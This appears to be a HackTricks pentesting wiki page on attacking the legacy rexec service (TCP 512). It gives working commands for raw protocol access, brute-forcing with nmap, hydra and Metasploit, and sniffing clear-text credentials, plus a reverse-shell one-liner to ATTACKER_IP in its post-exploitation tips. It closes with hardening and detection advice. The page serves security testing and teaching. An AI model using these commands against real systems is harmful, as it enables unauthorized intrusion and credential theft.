maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/512-pentesting-rexec.md
SirBroccoli bae7e23c05 Update 512-pentesting-rexec.md
2025-07-15 12:46:09 +02:00

117 lines
4.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 512 - Pentesting Rexec
{{#include ../banners/hacktricks-training.md}}
## Basic Information
Rexec (remote **exec**) is one of the original Berkeley *r*-services suite (together with `rlogin`, `rsh`, …). It provides a **remote command-execution** capability **authenticated only with a clear-text username and password**. The protocol was defined in the early 1980s (see RFC 1060) and is nowadays considered **insecure by design**. Nevertheless it is still enabled by default in some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests.
**Default Port:** TCP 512 (`exec`)
```
PORT STATE SERVICE
512/tcp open exec
```
> 🔥 All traffic including credentials is transmitted **unencrypted**. Anyone with the ability to sniff the network can recover the username, password and command.
### Protocol quick-look
1. Client connects to TCP 512.
2. Client sends three **NUL-terminated** strings:
* the port number (as ASCII) where it wishes to receive stdout/stderr (often `0`),
* the **username**,
* the **password**.
3. A final NUL-terminated string with the **command** to execute is sent.
4. The server replies with a single 8-bit status byte (0 = success, `1` = failure) followed by the command output.
That means you can reproduce the exchange with nothing more than `echo -e` and `nc`:
```bash
(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512
```
If the credentials are valid you will receive the output of `id` straight back on the same connection.
### Manual usage with the client
Many Linux distributions still ship the legacy client inside the **inetutils-rexec** / **rsh-client** package:
```bash
rexec -l user -p password <target> "uname -a"
```
If `-p` is omitted the client will prompt interactively for the password (visible on the wire in clear-text!).
---
## Enumeration & Brute-forcing
### [**Brute-force**](../generic-hacking/brute-force.md#rexec)
### Nmap
```bash
nmap -p 512 --script rexec-info <target>
# Discover service banner and test for stdout port mis-configuration
nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>
```
The `rexec-brute` NSE uses the protocol described above to try credentials very quickly .
### Hydra / Medusa / Ncrack
```bash
hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
```
`hydra` has a dedicated **rexec** module and remains the fastest offline bruteforcer . `medusa` (`-M REXEC`) and `ncrack` (`rexec` module) can be used in the same way.
### Metasploit
```
use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
```
The module will spawn a shell on success and store the credentials in the database .
---
## Sniffing credentials
Because everything is clear-text, **network captures are priceless**. With a copy of the traffic you can extract creds without touching the target:
```bash
tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
awk -F"\\0" '{print $2":"$3" -> "$4}' # username:password -> command
```
(In Wireshark enable *Decode As …​* TCP 512 → REXEC to view nicely-parsed fields.)
---
## Post-Exploitation tips
* Commands run with the privileges of the supplied user. If `/etc/pam.d/rexec` is mis-configured (e.g. `pam_rootok`), root shells are sometimes possible.
* Rexec ignores the users shell and executes the command via `/bin/sh -c <cmd>`. You can therefore use typical shell-escape tricks (`;`, ``$( )``, backticks) to chain multiple commands or spawn reverse shells:
```bash
rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
```
* Passwords are often stored in **~/.netrc** on other systems; if you compromise one host you may reuse them for lateral movement.
---
## Hardening / Detection
* **Do not expose rexec**; replace it with SSH. Virtually all modern *inetd* superservers comment the service out by default.
* If you must keep it, restrict access with TCP wrappers (`/etc/hosts.allow`) or firewall rules and enforce strong per-account passwords.
* Monitor for traffic to :512 and for `rexecd` process launches. A single packet capture is enough to detect a compromise.
* Disable `rexec`, `rlogin`, `rsh` together they share most of the same codebase and weaknesses.
---
## References
* Nmap NSE `rexec-brute` documentation [https://nmap.org/nsedoc/scripts/rexec-brute.html](https://nmap.org/nsedoc/scripts/rexec-brute.html)
* Rapid7 Metasploit module `auxiliary/scanner/rservices/rexec_login` [https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login)
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink